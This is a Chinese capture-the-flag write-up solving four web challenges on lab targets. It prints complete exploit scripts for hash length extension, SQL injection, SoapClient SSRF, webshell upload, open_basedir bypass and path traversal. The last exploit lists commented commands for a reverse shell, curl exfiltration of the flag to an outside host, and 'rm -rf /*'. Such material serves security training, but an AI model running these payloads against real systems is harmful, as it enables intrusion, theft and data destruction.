0x01、SSRF Me

知识点:

  • 代码审计
  • Hash 长度扩展攻击
  • SSRF

复现靶机:http://web68.buuoj.cn/

步骤:

1、先打开靶机看看,一打开就是源码。

右键查看源代码即可查看到换行之后的代码。

2、审计代码,可以看到有三个路由。分别看看代码,了解一下他们各自的功能。

  • /:首页,获取源码
  • /geneSign:获取 param 参数,结合预设的 action scan 来调用 getSign 函数来生成签名。
  • /Delta:从 cookie 里获取 action 和 sign,再获取 param 参数,结合 ip 构造一个 Task 类的对象,再以 json 返回其 Exec 方法的执行结果。

3、再来看到 getSign 函数。

是将 secert_key 和 param 和 action 拼在一起 md5 了。

4、然后来看到 waf 函数。

找 gopher 和 file 开头的,和调用处的判断结合起来看,是过滤掉了。

5、再来看到 Task 类的 Exec 方法。

先看 action 里有没有 scan,有的话就调用 scan 方法来读取内容并写到沙盒下的 result.txt 文件。

再就是看 action 里有没有 read,有的话就读出里面的内容,返回。

6、审计完代码,需求就很明确了:

  • 读取 flag.txt 到 result.txt。
  • 展示 result.txt 的内容。

7、上面的签名生成只生成了 action 为 scan 的签名。但注意到

这里算 md5 时 param,action 可控,并且 action 在最后,这样我们就可以利用哈希长度扩展攻击,在 action 后面拼接上我们想要的东西,并且预测出拼接之后的 md5。这里我们就可以在 scan 后面拼上 read 了。

8、而我们看到 scan 那个函数那,用的是 urlopen,这里有两种办法可以读取到本地文件。

用这两种方式之一书写 param 参数即可。

9、所以最终 exp 如下:

import hashpumpy
import requests
import urllib.parse

url = 'flag.txt'
# url = 'local-file:/etc/passwd'
r = requests.get('http://web68.buuoj.cn/geneSign', params={'param': url})
sign = r.text
hash_sign = hashpumpy.hashpump(sign, url + 'scan', 'read', 16)

r = requests.get('http://web68.buuoj.cn/De1ta', params={'param': url}, cookies={
    'sign': hash_sign[0],
    'action': urllib.parse.quote(hash_sign[1][len(url):])
})

print(r.text)

运行。

10、Flag 到手~

0x02、ShellShellShell

知识点:

  • 原题搜索(伪)
  • 反序列化
  • SSRF
  • 代码审计与限制绕过

复现靶机:http://web69.buuoj.cn

步骤:

1、先打开靶机看看,可以看到很眼熟,网上一搜即可直接找到原题。https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540

这题在 GUETCTF 也碰见过,简单来说就是注入拿到管理员的密码 MD5,再利用 SoapClient SSRF 登录管理员账户。具体的 WriteUp 参考上面那个链接里的 WriteUp,这里我直接把之前的 exp 改改拿来用了。

2、先用这个 WriteUp 里的 验证码生成脚本生成一下验证码表。

import hashlib
from itertools import product

c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_ []{}<>~`+=,.;:/?|'
captchas = [''.join(i) for i in product(c, repeat=3)]

print '[+] Genering {} captchas...'.format(len(captchas))
with open('captchas.txt', 'w') as f:
    for k in captchas:
        f.write(hashlib.md5(k).hexdigest()+' --> '+k+'\n')

3、再来跑管理员密码,上 exp。

import re
import string
import random
import time

import requests
import subprocess

_target = 'http://web69.buuoj.cn/index.php?action='

def get_creds():
    username = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    return username, password

def solve_code(html):
    code = re.search(r'Code\(substr\(md5\(\?\), 0, 5\) === ([0-9a-f]{5})\)', html).group(1)
    solution = subprocess.check_output(['grep', '^'+code, 'captchas.txt']).split()[2]
    return solution

def register(username, password):
    resp = sess.get(_target+'register')
    code = solve_code(resp.text)
    sess.post(_target+'register', data={'username':username,'password':password,'code':code})
    return True

def login(username, password):
    resp = sess.get(_target+'login')
    code = solve_code(resp.text)
    sess.post(_target+'login', data={'username':username,'password':password,'code':code})
    return True

def publish(sig, mood):
    return sess.post(_target+'publish', data={'signature':sig,'mood':mood})

sess = requests.Session()
username, password = get_creds()
print '[+] register({}, {})'.format(username, password)
register(username, password)
print '[+] login({}, {})'.format(username, password)
login(username, password)
print '[+] user session => ' + sess.cookies.get_dict()['PHPSESSID']

for i in range(1,33): # we know password is 32 chars (md5)
    mood = '(select concat(`O:4:\"Mood\":3:{{s:4:\"mood\";i:`,ord(substr(password,{},1)),`;s:2:\"ip\";s:14:\"80.212.199.161\";s:4:\"date\";i:1520664478;}}`) from ctf_users where is_admin=1 limit 1)'.format(i)
    payload = 'a`, {}); -- -'.format(mood)
    resp = publish(payload, '0')

    print(resp.text)

resp = sess.get(_target+'index')
moods = re.findall(r'img/([0-9]+)\.gif', resp.text)[::-1] # last publish will be read first in the html
admin_hash = ''.join(map(lambda k: chr(int(k)), moods))

print '[+] admin hash => ' + admin_hash

跑一下,得到管理员密码的 MD5。

4、去查一下这个 MD5,得到明文为 jaivypassword。

5、然后用上第二个 exp,来传个 shell 上去,从 /user.php~ 的 publish 函数看出这里和原题有所不同,直接上传到 upload 了。

exp:

import re
import sys
import string
import random
import requests
import subprocess
from itertools import product

_target = 'http://web69.buuoj.cn/'
_action = _target + 'index.php?action='

def get_creds():
    username = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    return username, password

def solve_code(html):
    code = re.search(r'Code\(substr\(md5\(\?\), 0, 5\) === ([0-9a-f]{5})\)', html).group(1)
    solution = subprocess.check_output(['grep', '^'+code, 'captchas.txt']).split()[2]
    return solution

def register(username, password):
    resp = sess.get(_action+'register')
    code = solve_code(resp.text)
    sess.post(_action+'register', data={'username':username,'password':password,'code':code})
    return True

def login(username, password):
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    sess.post(_action+'login', data={'username':username,'password':password,'code':code})
    return True

def publish(sig, mood):
    return sess.post(_action+'publish', data={'signature':sig,'mood':mood})#, proxies={'http':'127.0.0.1:8080'})

def get_prc_now():
    # date_default_timezone_set("PRC") is not important
    return subprocess.check_output(['php', '-r', 'date_default_timezone_set("PRC"); echo time();'])

def get_admin_session():
    sess = requests.Session()
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    return sess.cookies.get_dict()['PHPSESSID'], code

def brute_filename(prefix, ts, sessid):
    ds = [''.join(i) for i in product(string.digits, repeat=3)]
    ds += [''.join(i) for i in product(string.digits, repeat=2)]
    # find uploaded file in max 1100 requests
    for d in ds:
        f = prefix + ts + d + '.jpg'
        resp = requests.get(_target+'adminpic/'+f, cookies={'PHPSESSID':sessid})
        if resp.status_code == 200:
            return f
    return False

print '[+] creating user session to trigger ssrf'
sess = requests.Session()

username, password = get_creds()

print '[+] register({}, {})'.format(username, password)
register(username, password)

print '[+] login({}, {})'.format(username, password)
login(username, password)

print '[+] user session => ' + sess.cookies.get_dict()['PHPSESSID'] + ' '

print '[+] getting fresh session to be authenticated as admin'
phpsessid, code = get_admin_session()
print code

ssrf = 'http://127.0.0.1/\x0d\x0aContent-Length:0\x0d\x0a\x0d\x0a\x0d\x0aPOST /index.php?action=login HTTP/1.1\x0d\x0aHost: 127.0.0.1\x0d\x0aCookie: PHPSESSID={}\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 46\x0d\x0a\x0d\x0ausername=admin&password=jaivypassword&code={}\x0d\x0a\x0d\x0aPOST /foo\x0d\x0a'.format(phpsessid, code)
mood = 'O:10:\"SoapClient\":4:{{s:3:\"uri\";s:{}:\"{}\";s:8:\"location\";s:39:\"http://127.0.0.1/index.php?action=login\";s:15:\"_stream_context\";i:0;s:13:\"_soap_version\";i:1;}}'.format(len(ssrf), ssrf)
mood = '0x'+''.join(map(lambda k: hex(ord(k))[2:].rjust(2, '0'), mood))

payload = 'a`, {}); -- -'.format(mood)

print '[+] final sqli/ssrf payload: ' + payload

print '[+] injecting payload through sqli'
resp = publish(payload, '0')

print '[+] triggering object deserialization -> ssrf'
sess.get(_action+'index')#, proxies={'http':'127.0.0.1:8080'})

print '[+] admin session => ' + phpsessid

# switching to admin session
sess = requests.Session()
sess.cookies = requests.utils.cookiejar_from_dict({'PHPSESSID': phpsessid})

print '[+] uploading stager'
shell = {'pic': ('glzjin.php', '<?php eval($_POST[glzjin]);', 'image/jpeg')}
resp = sess.post(_action+'publish', files=shell)#, proxies={'http':'127.0.0.1:8080'})
print(resp.text)
prc_now = get_prc_now()[:-1]  # get epoch immediately

if 'upload success' not in resp.text:
    print '[-] failed to upload shell, check admin session manually'
    sys.exit(0)

6、运行,然后可以看到我们传了个马到 /upload/glzjin.php 了。

7、连接上,提示里说 flag 在内网,那就扫内网。

先打开 /proc/net/fib_trie,看看网络相关信息。可以看到有个 172.16.54.0/24 的 IP段,这台机器的 IP 为 172.16.54.3,那么就扫描网段内其他机器试试。

用蚁剑的端口扫描工具扫描试试。

可以看到扫描到 172.16.54.2 开放了 80 端口。

8、用虚拟终端执行 wget 访问一下这个地址,并保存到 glzjin.html 看看。

wget http://172.16.54.2 -O glzjin.html

9、打开 /upload/glzjin.html,发现又是原题。https://xi4or0uji.github.io/2018/11/06/2018%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9Bweb%E9%A2%98%E8%A7%A3/ 过了一堆限制之后,会包含上 hello 里所带的文件名。

10、不多废话,直接按照 WriteUp 里的,第一层数组来绕过,第二层随机文件名可以用路径穿越绕过。在 Postman 里构造请求如下。

11、然后因为靶机在内网,所以我们直接将其保存为 PHP 文件丢到第一个我们能访问到的靶机上执行。

这里注意请求体那里的文件,我们需要手动将上传文件内容补上,这里就是我们想要执行的内容,比如这里我就是在 /etc 下搜索带有 flag 的文件名然后把他们的内容列出来。

<?php

$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => "http://172.16.54.2",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"glzjin2.php\"\r\nContent-Type: false\r\n\r\n@<?php echo `find /etc -name *flag* -exec cat {} +`;\r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"hello\"\r\n\r\nglzjin2.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[2]\"\r\n\r\n222\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[1]\"\r\n\r\n111\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"file[0]\"\r\n\r\n/../glzjin2.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--",
  CURLOPT_HTTPHEADER => array(
    "Postman-Token: a23f25ff-a221-47ef-9cfc-3ef4bd560c22",
    "cache-control: no-cache",
    "content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
  ),
));

$response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
  echo "cURL Error #:" . $err;
} else {
  echo $response;
}

一访问,flag 就被找出来了~

12、Flag 到手~

0x03、Giftbox

据说是 CISCN 西北赛区的题。

知识点:

  • SQL 布尔盲注
  • PHP 语言特性

复现靶机:http://web72.buuoj.cn/

步骤:

1、打开靶机,可以看到是一个网页上的 Shell。

2、然后来看看有什么命令可以用。

下面 usage.md 里有提到 login 等几个命令,试了下其他几个都要登录。

3、那么就先来用 login 命令登录看看。测试了一下在用户名那里有注入点,可以根据回显进行布尔盲注。

4、写 exp 之前还需要来看看是怎么和服务器通讯的。抓包看看。

有个 totp 参数,结合内容来看似乎是根据时间变化的令牌,需要看下这里怎么生成的。

5、在 /js/main.js 里可以看到这个提示,还有这个令牌怎么生成的。

我们也可以把令牌拿到了。

6、综上,所用 exp 如下。表名列名其实是直接猜出来的,一猜就对了。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time

import requests

import pyotp as pyotp

totp = pyotp.TOTP('GAXG24JTMZXGKZBU', 8, interval=5)

def main():
    get_all_databases()


def http_get(payload):

    time.sleep(0.5)

    r = requests.post('http://web72.buuoj.cn/shell.php', params={'a': 'login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin', 'totp': totp.now()},
                      data={'dir': '/', 'pos': '/', 'filename': 'usage.md'})

    print('login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin')
    print(r.text)
    if 'password' in r.text:
        return True
    else:
        return False


# 获取数据库
def get_all_databases():
    # db_nums_payload = "select/**/count(*)/**/from/**/users"
    # db_numbers = half(db_nums_payload)
    # print("长度为:%d" % db_numbers)

    db_payload = "select/**/concat(password)/**/from/**/users"
    db_name = ""
    for y in range(1, 64):
        db_name_payload = "ascii(substr((" + db_payload + "),%d,1))" % (
            y)
        db_name += chr(half(db_name_payload))

    print("值:" + db_name)


# 二分法函数
def half(payload):
    low = 0
    high = 126
    # print(standard_html)
    while low <= high:
        mid = (low + high) / 2
        mid_num_payload = "%s/**/>/**/%d" % (payload, mid)
        # print(mid_num_payload)
        # print(mid_html)
        if http_get(mid_num_payload):
            low = mid + 1
        else:
            high = mid - 1
    mid_num = int((low + high + 1) / 2)
    return mid_num


if __name__ == '__main__':
    main()

7、跑一下,等一会儿,管理员密码就出来了。

8、用这个密码登录,成功。

9、然后来试一下 targeting,launch,destruct 那几个命令。

有点意思,似乎是一行行执行命令。

然后 targeting 那里似乎有些限制,再来看看。

前面的 code 限制两位。

后面的 position 限制十二位。

code 和 position 也有过滤。

10、总结一下每个命令。

  • targeting code position =>储存一条 $code = “position”;
  • launch => 将上面 targeting 起来的 code 按照字典序跑一遍。
  • destuct => 清空,恢复初始状态

11、那么就来体验一下 PHP 的神奇吧。

大括号里,可以直接这样调用变量。

也可以这样,外面包个 {},里面的东西会被 执行 后拿返回值。变量后面加个 (),就会尝试调用这个变量里存的名字所指向的函数了。

12、然后我们来看看刚才那个 phpinfo 所返回的内容,由于 content-type 为 json 所以不好看,我们可以存到本地的一个 html 文件然后打开看。

这里看到有 open_basedir,得想办法绕过。可以利用 https://xz.aliyun.com/t/4720 的方法绕过。

绕过的 payload 如下。

chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));

13、然后写个 exp 来把这个 payload 打过去。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time

import requests

import pyotp as pyotp

totp = pyotp.TOTP('GAXG24JTMZXGKZBU', 8, interval=5)

session = requests.session()


def login():
    time.sleep(0.5)

    r = session.get('http://web72.buuoj.cn/shell.php',
                    params={'a': 'login admin hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}', 'totp': totp.now()})

    return r.json()


def targeting(code, position):
    time.sleep(0.5)

    r = session.get('http://web72.buuoj.cn/shell.php', params={'a': 'targeting ' + code + ' ' + position, 'totp': totp.now()})

    return r.json()


def launch():
    time.sleep(0.5)

    r = session.get('http://web72.buuoj.cn/shell.php', params={'a': 'launch', 'totp': totp.now()})

    return r.text


def destuct():
    time.sleep(0.5)

    r = session.get('http://web72.buuoj.cn/shell.php', params={'a': 'destruct', 'totp': totp.now()})

    return r.json()


def main():
    login()
    destuct()
    targeting("a", "chdir")
    targeting("b", "img")
    targeting("c", "{$a($b)}")

    targeting("d", "ini_set")
    targeting("e", "open_basedir")
    targeting("f", "..")
    targeting("g", "{$d($e,$f)}")

    targeting("h", "{$a($f)}")
    targeting("i", "{$a($f)}")

    targeting("j", "Ly8v")
    targeting("k", "base64_")
    targeting("l", "decode")
    targeting("m", "$k$l")
    targeting("n", "{$m($j)}")
    targeting("o", "{$d($e,$n)}")

    targeting("p", "flag")
    targeting("q", "file_get")
    targeting("r", "_contents")
    targeting("s", "$q$r")

    targeting("t", "{$s($p)}")

    print(launch())


if __name__ == '__main__':
    main()

运行,就可以在结果里看到 flag 了。

14、Flag 到手~

0x04、cloudmusic_rev

国赛总决赛 Day1 Web1

知识点:

  • 原题搜索(伪)
  • 代码审计
  • so 分析 + off by null(别问我- -不会 PWN)
  • 恶意 so 构造

复现靶机:http://web71.buuoj.cn/

步骤:

1、打开靶机,是这样一个页面。

2、太熟悉了- -国赛决赛修了这题修了半天都没修好。直接原题的 exp 走一波 https://github.com/impakho/ciscn2019_final_web1

#!/usr/bin/python2
#coding:utf-8

from sys import *
from base64 import *
from Crypto.PublicKey import RSA
import requests
import string
import time
import hashlib
import random
import json
from datetime import datetime

timeout = 30.0
retry_count = 5
logging = 1

site_url = ''
s = requests.session()
time_zone_offset = 60 * 60 * 8
# command = "/usr/bin/tac /fl*g*"
# command = "/bin/bash -i >& /dev/tcp/172.93.221.66/8080 0>&1"
# command = "rm -rf /*"
# command = "/bin/echo 'test' >> /var/www/html/glzjin.txt"
# command = "curl http://xss.zhaoj.in/?b=`/usr/bin/tac /fl*g*`"
command = "/usr/bin/tac /fl*g* >> /var/www/html/uploads/music/glzjin.txt"
# command = "/bin/echo '<?php eval($_POST['glzjin']);' > /var/www/html/uploads/music/glzjin.php"
# command = "ls -l /var/www/html/ >> /var/www/html/uploads/music/glzjin.txt"

preset_key = b64decode('LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUNkd0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQW1Fd2dnSmRBZ0VBQW9HQkFPTWp4eXVIcWRuSmFyUDAKSHl1eFVVRHkvY1BGaWMzYjM5WUQrVzY5R2VSRkpMRDUraFhaM3lYMTFBQ2pMSHpESFpIbGgrajRQZncxdEhMMApwY3FPZmJ0TTF4am5sV2FKd3lZQzRpWlBSRXJUTGNVd282UmhKS2diUkxHQVpLUmxmWFFMbVRwbGd0ZnJoUGhJCng0ZzM2ZEtLTVVlYjZnOHJ3blVrUnVYSVlhd2hBZ01CQUFFQ2dZRUEwUWZrQzFOV0pHOFFHM3ZXRThlakZ6cUgKL3RxVDd6Y2h6enJwR2RnOU02M09EbkIramcxckp1d01wbW1FVDJ6Z2tadkNiOHZFZjQ2TStoM2JWWVc4Zmg1Zwp4dTlXdmJFb0orUGZtV2R6SmowUlRYT05vZXVzRUgwODI3eGl6UXlIc21RbkNBQzkyUS9IQlg4WVl0eDgxN0pOCnNIUmNFMHdacVFmL0dkU0VnK0VDUVFEMGVjUlJYN3BsT0hTOHNjTjFqT3FOMEl5S2pvamljWWNQL2h3ckU2ZjIKZGR3dEpnNlJBb3E3SHlRdUFjYmZCazJwdS9UeDRsSHRycm9qRXlxQTRLdjdBa0VBN2RqUEFCakEvaHlpV1oxTQpDUm5DTTRudWdDUEE1SXRxZktzb3UvbE51cUdYZXFVYW5XNjBTcmJDVWJrM2g2NnkwdXV2T0xzendEWllONnNNClFEWFJrd0pBUlB3N1BtOFJ6TkF5ZUxCOHBDWUFaY1lNY21pb0RhWFZZOWpqbi9BcS9Ddmoxa1dmNUtGZi9rOWEKU1RVdEplL0VhSG5tTTM4V2VVaE5zK29MbTFSS2t3SkFNcCtyNTJ4ZFgzaSt3VzR1YWQxMnJUdVZiT2F2UHJYQgowNGttb1dPOXZKUjZSbHR2MzhSWlVYRzJ5R2d3dm90YmVuTTVsMHlaQmpkSzdZWlZsREVnU3dKQkFMb29yYmZnCkJzMW5BbGU3WnhXK0JkRXlLVG9ZUWdWVU1MRytWeDFITW9rU0dZNlh6blNFYzdpK25weFBoeGd6Q1VWdHpxNU4KR3E4Q3ppN2FJUFVuY0lnPQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==')
preset_music = b64decode('SUQzBAAAAAABBFRSQ0sAAAADAAADMQBUSVQyAAAAEgAAA2JiYmJiYmJiYmJiYmJiYmIAVEFMQgAAABIAAANjY2NjY2NjY2NjY2NjY2NjAFRQRTEAAAASAAADYWFhYWFhYWFhYWFhYWFhYQA=')
preset_firmare = b64decode('')
# preset_firmare = b64decode('')


class php_rand():

    MT_RAND_MT19937 = 0
    MT_RAND_PHP = 1
    php_N = 624
    php_M = 397
    php_left = 0
    php_next = 0
    php_state = [0] * (php_N + 1)
    php_mode = 0

    def __init__(self, seed, mode=0):
        self.php_mt_srand(seed)
        self.php_mode = mode


    def seed(self, seed):
        self.php_mt_srand(seed)


    def rand(self):
        return self.php_mt_rand()


    def hiBit(self, u):
        return u & 0x80000000


    def loBit(self, u):
        return u & 0x00000001


    def loBits(self, u):
        return u & 0x7FFFFFFF


    def mixBits(self, u, v):
        return self.hiBit(u) | self.loBits(v)


    def twist(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(v)) & 0x9908b0df)


    def twist_php(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(u)) & 0x9908b0df)


    def php_mt_initialize(self, seed):
        state = self.php_state
        N = self.php_N
        state[0] = seed & 0xffffffff
        for i in range(1, N):
            state[i] = (1812433253 * (state[i - 1] ^ (state[i - 1] >> 30)) + i) & 0xffffffff
        self.php_state = state


    def php_mt_reload(self):
        self.php_left = 0
        state = self.php_state
        N = self.php_N
        M = self.php_M
        p = 0
        i = N - M
        if self.php_mode == self.MT_RAND_MT19937:
            while i > 0:
                i -= 1
                state[p] = self.twist(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist(state[p+M-N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist(state[p + M - N],state[p + 0],state[0])
        else:
            while i > 0:
                i -= 1
                state[p] = self.twist_php(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist_php(state[p + M - N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist_php(state[p + M - N],state[p + 0],state[0])
        self.php_left = N
        self.php_next = 0
        self.php_state = state


    def php_mt_srand(self, seed):
        self.php_mt_initialize(seed)
        self.php_mt_reload()


    def php_mt_rand(self):
        if self.php_left == 0: self.php_mt_reload()
        self.php_left -= 1
        s1 = self.php_state[self.php_next]
        s1 ^= (s1 >> 11)
        s1 ^= (s1 << 7) & 0x9d2c5680
        s1 ^= (s1 << 15) & 0xefc60000
        self.php_next += 1
        return ( s1 ^ (s1 >> 18)) >> 1


# get random string
def rand_str(length=8):
    return ''.join(random.sample(string.ascii_letters + string.digits, length))


# get method
def get(session, url):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                r = s.get(url, timeout=timeout)
            else:
                r = requests.get(url, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r


# post method
def post(session, url, data, files=''):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                if files=='':
                    r = s.post(url, data=data, timeout=timeout)
                else:
                    r = s.post(url, data=data, files=files, timeout=timeout)
            else:
                if files=='':
                    r = requests.post(url, data=data, timeout=timeout)
                else:
                    r = requests.post(url, data=data, files=files, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r


# login with username and password
def login(username, password):
    url = site_url + '/hotload.php?page=login'
    data = {'username': username, 'password': password}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    url = site_url + '/hotload.php?page=upload'
    res = get(1, url)
    if 'fileuploaded' not in res.text:
        return False
    return True


# reg with username and password
def reg(username, password):
    url = site_url + '/hotload.php?page=reg'
    if logging: print(url)
    res = get(1, url)
    show_code = ''
    show_calc = ''
    try:
        show_code = res.text.split('show_code">')[1].split('<')[0]
        show_calc = res.text.split('show_calc">')[1].split('<')[0]
        if logging: print(len(show_calc))
        if len(show_calc) != 6:
            print('invalid show_calc length')
            return False
    except:
        return False
    if logging: print("show_code",show_code)
    if logging: print("show_calc",show_calc)
    code = ''
    for i in range(1, 100000000):
        code = str(i)
        if hashlib.md5(code + show_code).hexdigest()[:6] == show_calc.lower(): break
    data = {'username': username, 'password1': password, 'password2': password, 'code': code}
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        return True
    return False


# upload music [diff]
def upload_music():
    url = site_url + '/hotload.php?page=upload'
    data = {'file_id': '0'}
    music = preset_music[:0x6] + '\x00\x00\x03\x00' + preset_music[0x0a:0x53]
    music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
    files = {'file_data': music}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            # n54LuyJyYLVpVO2w
            return b64decode(json.loads(res.content.strip())['artist'])[:16]
        except:
            return ''
    return ''


# upload firmware [diff]
def upload_firmware(command):
    if len(command) > 0x100: return -1
    url = site_url + '/hotload.php?page=firmware'
    data = {'file_id': '0'}
    command = command.ljust(0x100, '\x00')
    firmware = preset_firmare.replace('a' * 0x100, command)
    # firmware = preset_firmare
    files = {'file_data': firmware}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print("Upload: " + res.text)
    if '"status":1' in res.text:
        if 'Date' in res.headers.keys():
            print("Date Header: " + res.headers['Date'])
            return int(datetime.strptime(res.headers['Date'], "%a, %d %b %Y %X %Z").strftime("%s")) + time_zone_offset
        else:
            return int(time.time())
    return -1


# get firmware version
def firmware_version(path):
    if len(path)>0x40: return ''
    url = site_url + '/hotload.php?page=firmware'
    data = {'path': path}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            return json.loads(res.content.strip())['info']
        except:
            return ''
    return ''


# show result
def show_result(vuln1, vuln2, msg):
    result = ''
    if vuln1 == -1:
        result += 'Vuln 1 check: unknown.\n'
    elif vuln1 == 0:
        result += 'Vuln 1 check: fail.\n'
    else:
        result += 'Vuln 1 check: pass.\n'
    if vuln2 == -1:
        result += 'Vuln 2 check: unknown.\n'
    elif vuln2 == 0:
        result += 'Vuln 2 check: fail.\n'
    else:
        result += 'Vuln 2 check: pass.\n'
    result += msg
    print(result)
    exit()


# get flag
def get_flag():
    path = 0
    vuln1 = -1
    vuln2 = -1
    logined = -1
    if path == 0:
        username = rand_str(8)
        password = rand_str(8)
        res = reg(username, password)
        if not res: show_result(vuln1, vuln2, 'register fail')
        res = login(username, password)
        if not res: show_result(vuln1, vuln2, 'login fail')
        time.sleep(3)
        res = upload_music()
        if res == '':
            vuln1 = 0
            show_result(vuln1, vuln2, 'leak admin password fail')
        admin_password = res
        global s
        s = requests.session()
        res = login('admin', admin_password)
        if not res:
            vuln1 = 0
            show_result(vuln1, vuln2, 'leak wrong admin password')
        vuln1 = 1
    time.sleep(3)
    guess_server_time = upload_firmware(command)
    print(guess_server_time)
    if guess_server_time == -1:
        show_result(vuln1, vuln2, 'upload fail')
    vuln2 = 0
    succ_keyword = '固件版本号:'
    if vuln2 == 0:
        for i in range(20):
            rander = php_rand(guess_server_time - i)
            path = hashlib.md5(str(rander.rand()) + '182.91.60.190').hexdigest()
            try:
                prev_flag = firmware_version(path).encode('utf-8')
            except:
                continue
            if succ_keyword in prev_flag:
                vuln2 = 1
                prev_flag = prev_flag.replace(succ_keyword, '').strip()
                break
    show_result(vuln1, vuln2, prev_flag)


if __name__ == '__main__':
    if len(argv) != 3:
        print("wrong params.")
        print("example: python %s %s %s" % (argv[0], '127.0.0.1', '80'))
        exit()
    ip = argv[1]
    port = int(argv[2])
    site_url = 'http://%s:%d' % (ip, port)
    get_flag()

和原题不同的是有以下几个地方:

1、验证码改为六位。

2、上传音乐,标题那里的 size 需要改改,原先是 0x300,直接溢出了,这里是 0x70,off by null 了。(不懂 PWN,摆手)

3、读源码那里需要二次编码,要不然会被拦截 .php。

4、最后的 firmware 上传那里,国赛的题是直接取用户名,这里还整个 IP 地址。

国赛

5、最后的加载固件读版本号,国赛那里是直接读版本号之后回显,这里则是没回显了,需要自己想办法带出来,所以我就读出之后输出到可访问到的文件了。

/usr/bin/tac /flg >> /var/www/html/uploads/music/glzjin.txt

国赛

3、运行,看到 Bad Version就说明成功了。

4、访问 /uploads/music/glzjin.txt,得到 flag。

国赛时候没做出来,这回又碰到这个题,就着 WriteUp 也算收获了一些东西了。